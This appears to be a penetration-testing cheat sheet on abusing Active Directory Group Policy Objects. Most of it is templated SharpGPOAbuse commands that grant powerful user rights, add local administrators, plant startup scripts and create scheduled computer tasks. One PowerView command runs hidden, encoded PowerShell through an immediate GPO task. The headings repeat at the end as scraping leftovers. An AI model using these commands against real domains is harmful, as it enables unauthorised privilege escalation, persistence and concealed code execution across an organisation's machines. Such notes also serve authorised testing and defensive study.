GPO

Force GPO update

gpupdate /force

Create a GPO

RSAT

https://4sysops.com/archives/run-powershell-scripts-as-immediate-scheduled-tasks-with-group-policy/

Create scheduled task

File to execute

GPO creator abuse

SharpGPOAbuse.exe --AddUserRights --UserRights "<SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight,...>" --UserAccount <user> --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <user> --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddUserScript --ScriptName <StartupScript.bat> --ScriptContents "<CLI>" --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddComputerTask --TaskName "<task_name>" --Author <domain\user> --Command "<cmd.exe>" --Arguments "</c ...>"" --GPOName "<GPO_name>"

PowerView

New-GPOImmediateTask -TaskName <task_name> -GPODisplayName <GPO_name> -CommandArguments '<-NoP -NonI -W Hidden -Enc ...>' -Force

Force GPO update​

Create a GPO​

RSAT​

GPO creator abuse​

Force GPO update

Create a GPO

RSAT

GPO creator abuse